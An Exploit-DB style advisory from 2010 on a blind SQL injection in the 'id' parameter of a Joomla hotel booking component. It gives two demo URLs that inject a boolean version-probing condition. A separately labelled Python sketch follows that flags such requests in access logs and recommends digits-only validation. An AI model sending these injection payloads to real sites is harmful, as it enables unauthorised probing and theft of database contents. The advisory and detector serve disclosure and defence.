Joomla! Component Regional Booking - 'id' Blind SQL Injection

EDB-ID: 11061
CVE: N/A
Author: Hussin X
Type: webapps
Platform: PHP
Date: 2010-01-07


Joomla Component Regional Booking (id) Blind SQL Injection Vulnerability
___________________________________

Author: Hussin X

Home : www.IQ-TY.com/vb

___________________________________

script : http://www.joomlahbs.com/


Demo :
_______


http://site.com/p3/index.php?option=com_tophotelmodule&task=showhoteldetails&id=3+and substring(@@version,1,1)=4 > ( FALSE )



http://site.com/p3/index.php?option=com_tophotelmodule&task=showhoteldetails&id=3+and substring(@@version,1,1)=5 > ( TRUE )






Greetz : IQ-SecuritY Members | Milw0rM | SecurityReason
ALL Arabic Hack And Kurdish hack
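
Detection sketch for the requests shown in the demo, added here as an example and not part of the original advisory: it scans web server access logs for requests to com_tophotelmodule whose id parameter is not a plain integer. It assumes Common Log Format and that legitimate id values are digits only; the log lines and client addresses are constructed samples.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Component name taken from the demo URLs in the advisory.
COMPONENT = "com_tophotelmodule"

# Request field of a Common Log Format line: "METHOD URI PROTOCOL"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines (documentation address range 203.0.113.0/24).
SAMPLE_LOG = [
    '203.0.113.7 - - [07/Jan/2010:10:00:01 +0000] "GET /p3/index.php?'
    'option=com_tophotelmodule&task=showhoteldetails&id=3 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [07/Jan/2010:10:00:05 +0000] "GET /p3/index.php?'
    'option=com_tophotelmodule&task=showhoteldetails'
    '&id=3+and%20substring(@@version,1,1)=5 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [07/Jan/2010:10:00:09 +0000] "GET /p3/index.php?'
    'option=com_content&id=abc HTTP/1.1" 200 100',
]


def suspicious_id(uri):
    """Return the decoded id value if a request to the component carries
    an id that is not digits only (assumption: real ids are integers)."""
    query = parse_qs(urlsplit(uri).query, keep_blank_values=True)
    if query.get("option", [""])[0] != COMPONENT:
        return None
    # Check every id value: duplicated parameters are a common way to
    # slip past filters that only inspect the first occurrence.
    for value in query.get("id", []):
        if not re.fullmatch(r"\d+", value):
            return value
    return None


def scan(lines):
    """Return (client_address, decoded_id) for each flagged log line."""
    hits = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        value = suspicious_id(match.group(1))
        if value is not None:
            hits.append((line.split(" ", 1)[0], value))
    return hits


if __name__ == "__main__":
    for client, value in scan(SAMPLE_LOG):
        print(f"{client}: non-integer id -> {value!r}")
```

The same digits-only rule, enforced server side before the value reaches the query, is what closes this class of bug.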